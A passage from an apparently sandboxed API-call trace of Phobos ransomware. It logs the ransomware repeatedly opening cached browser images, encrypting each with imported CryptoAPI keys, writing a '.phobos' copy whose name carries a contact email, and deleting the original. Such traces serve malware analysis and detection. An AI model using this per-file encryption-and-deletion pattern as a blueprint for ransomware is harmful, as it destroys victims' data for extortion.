Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.894] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.894] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x19cf, lpOverlapped=0x0) returned 1 [0181.974] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x19d0, dwBufLen=0x19d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x19d0) returned 1 [0181.975] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x19d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x19d0, lpOverlapped=0x0) returned 1 [0181.975] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0181.975] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.975] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.975] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.975] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.976] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.976] CloseHandle (hObject=0x180) returned 1 [0181.976] CloseHandle (hObject=0x15c) returned 1 [0181.976] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg")) returned 1 [0181.976] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.977] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8497) returned 1 [0181.977] CloseHandle (hObject=0x15c) returned 1 [0181.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg")) returned 0x2020 [0181.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.979] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.979] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.979] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.979] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.979] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2131, lpOverlapped=0x0) returned 1 [0182.089] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2140, dwBufLen=0x2140 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2140) returned 1 [0182.089] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2140, lpOverlapped=0x0) returned 1 [0182.090] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0182.090] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.090] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.090] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.090] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.090] CryptDestroyKey (hKey=0xa32d68) returned 1 [0182.090] CloseHandle (hObject=0x15c) returned 1 [0182.090] CloseHandle (hObject=0x180) returned 1 [0182.091] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZzuz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzzuz[1].jpg")) returned 1 [0182.092] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.092] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8864) returned 1 [0182.092] CloseHandle (hObject=0x180) returned 1 [0182.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg")) returned 0x2020 [0182.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.095] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.095] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.096] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0182.096] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.096] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x22a0, lpOverlapped=0x0) returned 1 [0182.160] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x22b0, dwBufLen=0x22b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x22b0) returned 1 [0182.160] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x22b0, lpOverlapped=0x0) returned 1 [0182.161] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0182.161] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.161] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.161] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.161] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.161] CryptDestroyKey (hKey=0xa32d68) returned 1 [0182.161] CloseHandle (hObject=0x180) returned 1 [0182.161] CloseHandle (hObject=0x15c) returned 1 [0182.161] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc04o2[1].jpg")) returned 1 [0182.162] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.162] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2180) returned 1 [0182.162] CloseHandle (hObject=0x15c) returned 1 [0182.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg")) returned 0x2020 [0182.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.162] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.163] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0182.163] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.163] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x884, lpOverlapped=0x0) returned 1 [0182.233] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x890, dwBufLen=0x890 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x890) returned 1 [0182.233] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x890, lpOverlapped=0x0) returned 1 [0182.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0182.234] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.234] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.234] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.234] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.234] CryptDestroyKey (hKey=0xa32d68) returned 1 [0182.234] CloseHandle (hObject=0x15c) returned 1 [0182.234] CloseHandle (hObject=0x180) returned 1 [0182.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0BiZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0biz[1].jpg")) returned 1 [0182.235] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.236] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2683) returned 1 [0182.236] CloseHandle (hObject=0x180) returned 1 [0182.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg")) returned 0x2020 [0182.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.236] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.236] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.237] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0182.237] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.237] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa7b, lpOverlapped=0x0) returned 1 [0182.285] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa80, dwBufLen=0xa80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa80) returned 1 [0182.285] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa80, lpOverlapped=0x0) returned 1 [0182.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0182.286] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.286] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.286] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.286] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.286] CryptDestroyKey (hKey=0xa32d68) returned 1 [0182.286] CloseHandle (hObject=0x180) returned 1 [0182.286] CloseHandle (hObject=0x15c) returned 1 [0182.286] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[2].jpg")) returned 1 [0182.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 